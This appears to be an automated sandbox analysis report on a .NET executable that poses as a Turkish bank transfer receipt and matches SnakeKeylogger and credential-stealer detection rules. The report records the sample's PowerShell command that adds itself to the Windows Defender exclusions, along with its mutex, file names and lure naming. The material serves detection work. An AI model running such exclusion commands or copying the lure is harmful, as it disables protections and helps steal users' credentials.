Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FD5362	6_2_00FD5362
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FDC468	6_2_00FDC468
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FDC738	6_2_00FDC738
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FD69A0	6_2_00FD69A0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FDE988	6_2_00FDE988
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FDCA08	6_2_00FDCA08
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FDCCD8	6_2_00FDCCD8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FD6FC8	6_2_00FD6FC8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FDCFAA	6_2_00FDCFAA
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FD29E0	6_2_00FD29E0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FDF979	6_2_00FDF979
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FDE97A	6_2_00FDE97A
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FD3E09	6_2_00FD3E09
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B81D0	6_2_056B81D0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B7B78	6_2_056B7B78
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B8FB0	6_2_056B8FB0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B0D48	6_2_056B0D48
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BE548	6_2_056BE548
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BC548	6_2_056BC548
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BC558	6_2_056BC558
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BA928	6_2_056BA928
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B0D39	6_2_056B0D39
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BA938	6_2_056BA938
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BE538	6_2_056BE538
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BC9E8	6_2_056BC9E8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B15E8	6_2_056B15E8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B15F8	6_2_056B15F8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BE9C8	6_2_056BE9C8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BE9D8	6_2_056BE9D8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BC9D8	6_2_056BC9D8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B11A0	6_2_056B11A0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B119F	6_2_056B119F
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B1190	6_2_056B1190
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B3460	6_2_056B3460
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B0040	6_2_056B0040
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B3450	6_2_056B3450
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BBC2A	6_2_056BBC2A
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BDC28	6_2_056BDC28
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B6027	6_2_056B6027
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BBC38	6_2_056BBC38
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B6030	6_2_056B6030
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B3008	6_2_056B3008
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B0006	6_2_056B0006
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BDC19	6_2_056BDC19
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BFC18	6_2_056BFC18
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B08E0	6_2_056B08E0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B08F0	6_2_056B08F0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BC0C8	6_2_056BC0C8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BE0A7	6_2_056BE0A7
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B38B8	6_2_056B38B8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BE0B8	6_2_056BE0B8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BC0B7	6_2_056BC0B7
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B6488	6_2_056B6488
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B0498	6_2_056B0498
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B7B69	6_2_056B7B69
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BF778	6_2_056BF778
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B5770	6_2_056B5770
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B2749	6_2_056B2749
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B2758	6_2_056B2758
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B5328	6_2_056B5328
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B7720	6_2_056B7720
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BD308	6_2_056BD308
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B2300	6_2_056B2300
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BB307	6_2_056BB307
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BB318	6_2_056BB318
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B7710	6_2_056B7710
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B2FF9	6_2_056B2FF9
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B5BCB	6_2_056B5BCB
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B5BD8	6_2_056B5BD8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BB7A8	6_2_056BB7A8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B8FA1	6_2_056B8FA1
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B2BA0	6_2_056B2BA0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B2BB0	6_2_056B2BB0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BF788	6_2_056BF788
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B5780	6_2_056B5780
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BD787	6_2_056BD787
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BD798	6_2_056BD798
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BB798	6_2_056BB798
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BEE68	6_2_056BEE68
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BCE67	6_2_056BCE67
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B4A78	6_2_056B4A78
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BCE78	6_2_056BCE78
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B6E72	6_2_056B6E72
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B6E70	6_2_056B6E70
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B4A74	6_2_056B4A74
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B1A41	6_2_056B1A41
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B1A50	6_2_056B1A50
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BEE57	6_2_056BEE57
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B4620	6_2_056B4620
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B6A18	6_2_056B6A18
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B4610	6_2_056B4610
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BF2E7	6_2_056BF2E7
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BF2F8	6_2_056BF2F8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B22F0	6_2_056B22F0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056BD2F7	6_2_056BD2F7
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B72C8	6_2_056B72C8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B4EC8	6_2_056B4EC8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B4ED0	6_2_056B4ED0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B1EA8	6_2_056B1EA8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B72B8	6_2_056B72B8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_056B1E98	6_2_056B1E98

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1378635562.00000000009DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1388032637.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1384724354.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1389114420.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000000.1334861345.00000000004B2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameZBwN.exeL vs dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3798542739.0000000000D78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3807922340.0000000006C69000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Binary or memory string: OriginalFilenameZBwN.exeL vs dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7540, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/6@3/3

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.log

Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Mutant created: NULL
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Mutant created: \Sessions\1\BaseNamedObjects\NLXDfXBujze
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_futqoqw2.dyy.ps1

Jump to behavior

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process created: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"
